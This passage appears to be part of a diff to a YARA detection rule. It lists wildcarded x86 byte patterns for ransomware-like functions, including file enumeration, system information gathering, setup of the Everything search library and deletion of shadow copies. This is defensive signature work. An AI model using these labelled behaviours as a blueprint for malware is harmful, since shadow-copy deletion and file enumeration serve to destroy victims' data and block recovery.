-            ?? ?? ?? ?? 66 89 01 8D 45 ?? 3B C8 74 ?? 83 7D ?? ?? FF 75 ?? 0F 43 45 ?? 50 E8 ??
-            ?? ?? ?? 8B 73 ?? 8D 85 ?? ?? ?? ?? 50 56 53 E8 ?? ?? ?? ?? 8B 55 ?? B9
-        }
-		$find_files_p3 = {
-            2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 42 8B 5D ?? 89 55 ?? 89 06 89 9D ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8B D4
-            89 A5 ?? ?? ?? ?? 33 C0 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02
-            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? D1 F9 51 50 8B CA E8 ?? ??
-            ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 83 EC ?? 8D 45 ?? 8B CC
-            50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8
-            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 7C
-            ?? 85 F6 75 ?? A1 ?? ?? ?? ?? EB ?? 83 FE ?? 75 ?? A1 ?? ?? ?? ?? EB ?? 83 FE ?? 75
-            ?? A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 87 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ??
-            83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
-            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B BD ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 8B 4E ?? 83 F9 ?? 72 ??
-            8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ??
-            83 F8 ?? 0F 87 ?? ?? ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 46 ?? ?? ??
-            ?? ?? 6A ?? C7 46 ?? ?? ?? ?? ?? 56 66 89 06 E8 ?? ?? ?? ?? 83 C4 ?? 8B 13 8B 75 ??
-            6A ?? 4E 8B 4A ?? 8B 02 52 89 75 ?? 89 01 8B 0A 8B 42 ?? 89 41 ?? E8 ?? ?? ?? ?? 83
-        }
-		$find_files_p4 = {
-            C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D
-            ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
-            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 33 C0 8B 55
-            ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ??
-            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 03 89 1B 89 5B
-            ?? 3B C3 74 ?? 8B 30 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 3B F3 75 ?? 6A ?? 53 E8
-            ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 14 55 ?? ?? ??
-            ?? 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
-            ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ??
-            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ??
-            8B 03 89 1B 89 5B ?? 3B C3 0F 84 ?? ?? ?? ?? 8B 30 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8B C6 3B F3 75 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ??
-            ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$write_console_log_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? F0 0F B1 0A 85 C0 0F 84
-            ?? ?? ?? ?? 8B 45 ?? 8D 7C 24 ?? 85 C0 B9 ?? ?? ?? ?? 0F 45 C8 8D 45 ?? 50 33 F6 8B
-            C7 56 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 FF 70 ?? 83 C9 ?? 51 E8 ?? ?? ?? ??
-            83 C9 ?? 83 C4 ?? 85 C0 0F 48 C1 85 C0 78 ?? 3D ?? ?? ?? ?? 77 ?? 75 ?? EB ?? BE ??
-            ?? ?? ?? 33 C0 66 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 44 44 ?? 89 44 24 ?? 85 F6
-            79 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? BA ?? ?? ?? ?? 50 8D 44 24 ?? 50 51 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 75 ?? 8B 44 24 ?? 8B F8 8D 44 24 ?? 2B F8 83
-            E7 ?? 85 FF 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 50 0F
-            B7 44 24 ?? 50 0F B7 44 24 ?? 50 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 8B F0 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ??
-            ?? 8B 0D ?? ?? ?? ?? F6 C1 ?? 74 ?? 8B 15 ?? ?? ?? ?? 83 FA ?? 74 ?? 6A ?? 8D 44 24
-            ?? 50 8D 04 36 8B 35 ?? ?? ?? ?? 50 8D 44 24 ?? 50 52 FF D6 6A ?? 8D 44 24 ?? 50 57
-            8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF
-        }
-		$write_console_log_p2 = {
-            35 ?? ?? ?? ?? FF D6 8B 0D ?? ?? ?? ?? F6 C1 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 6A ?? 6A ?? 6A ?? 8B D8 8D 84
-            24 ?? ?? ?? ?? 53 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 0C 7D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B F0 8D 84 24 ?? ?? ?? ?? 56 53 50 6A ?? 6A ??
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 3D ?? ??
-            ?? ?? ?? 74 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF D3 8D 04 45 ?? ?? ?? ?? 89
-            44 24 ?? 8D 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50
-            6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC
-            E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$get_system_information_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 0F 44 C3 6A ?? A2 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6
-            B9 ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51
-            68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CA
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ?? ?? ?? 8D 79 ?? 66 8B 01
-            83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 1F 84 00
-        }
-		$get_system_information_p2 = {
-            C6 00 ?? 8D 40 ?? 83 E9 ?? 75 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 57 C0 8B 85 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? 0F AC C6 ?? 8B 85 ?? ?? ?? ?? 0F AC C1 ?? 6A ?? 66 0F 13 85 ?? ?? ??
-            ?? 6A ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 BD
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
-            50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 0F 45 C3 A2 ?? ?? ?? ?? 33 F6 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
-            84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? FF D3 68 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B F0 33
-            C0 85 F6 0F 44 C8 8D 85 ?? ?? ?? ?? 50 51 56 6A ?? FF B5 ?? ?? ?? ?? 89 8D ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 0F 1F 44 00 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 85
-            F6 74 ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? FF D3 56 6A ?? 50 FF
-            15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 56 6A ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-        }
-		$get_system_information_p3 = {
-            B5 ?? ?? ?? ?? 33 DB 3B 1E 0F 83 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 74 DE ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? C6 05 ?? ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? FF 74 DE ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? F6 44 DE ?? ?? B9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 0F 45 C1
-            A2 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66
-            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B 54 DE ?? 8B 4C DE ?? 50 E8 ?? ?? ?? ?? 8B 47 ??
-            8D 8D ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 51 50 57 E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 42 89 47 ?? 89
-            95 ?? ?? ?? ?? 89 01 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 43 E9 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03
-            C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 50 0F 43 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ??
-            8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 85 ?? ?? ?? ?? 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ??
-            ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 8B C2 51 50
-        }
-		$get_system_information_p4 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 45 ?? ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 85 ?? ??
-            ?? ?? 41 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ?? ?? ?? BB
-            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 8B BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 85
-            F6 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 35 ??
-            ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 FF B5 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 8B CA C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ??
-            ?? ?? ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B 8D ?? ?? ??
-            ?? D1 F9 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 0F B6 0D ??
-            ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 45 CB A3 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 0F 95 05 ?? ?? ?? ?? 88 0D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 0F 94 05 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15
-        }
-		$everything_library_setup_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ??
-            64 A3 ?? ?? ?? ?? 88 55 ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 80 7D ?? ?? 74 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 6A ??
-            6A ?? B2 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 33 D2 C6 45
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B
-            35 ?? ?? ?? ?? 0F 43 45 ?? 50 FF D6 85 C0 74 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? B0 ??
-            E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ??
-            8B CA C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 8D 79 ?? 66 8B 01 83 C1 ?? 66
-            85 C0 75 ?? 2B CF D1 F9 51 52 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ??
-            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 4D ?? 8D 4D ?? F3
-        }
-		$everything_library_setup_p2 = {
-            0F 7E 45 ?? C6 45 ?? ?? 83 7D ?? ?? FF 75 ?? 66 0F 7E C8 0F 11 4D ?? 0F 43 C8 66 0F
-            D6 45 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83
-            7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF D6 85 C0 74 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? B0
-            ?? EB ?? 8A 45 ?? C6 05 ?? ?? ?? ?? ?? 84 C0 74 ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ??
-            32 D2 E8 ?? ?? ?? ?? 8A C8 88 4D ?? 84 C9 75 ?? B2 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8A C8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 33 D2 84 C9 88 4D ?? 0F 44
-            C2 A2 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83
-            FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
-            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 8B 4D ??
-            64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3
-        }
-		$delete_shadow_copies_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F
-            88 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 85 C0 0F 88 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ??
-            ?? ?? ?? 80 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? 0F 45 C1 8D 4D ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 8B 00 8B 70 ?? E8 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ?? 51 6A ?? 50 FF 75
-            ?? FF D6 C7 45 ?? ?? ?? ?? ?? 83 CF ?? 8B 75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1
-            4E ?? 49 75 ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ??
-            8B 46 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 FF D3 83 7D ?? ?? 0F 8C ?? ?? ?? ??
-        }
-		$delete_shadow_copies_p2 = {
-            8B 45 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 00 8B 70 ?? 8B 45 ?? 89 45
-            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ??
-            51 FF 75 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 75 ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8B
-            75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1 4E ?? 49 75 ?? 85 F6 74 ?? 8B 06 85 C0 74
-            ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 78 ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8B 45 ?? 79
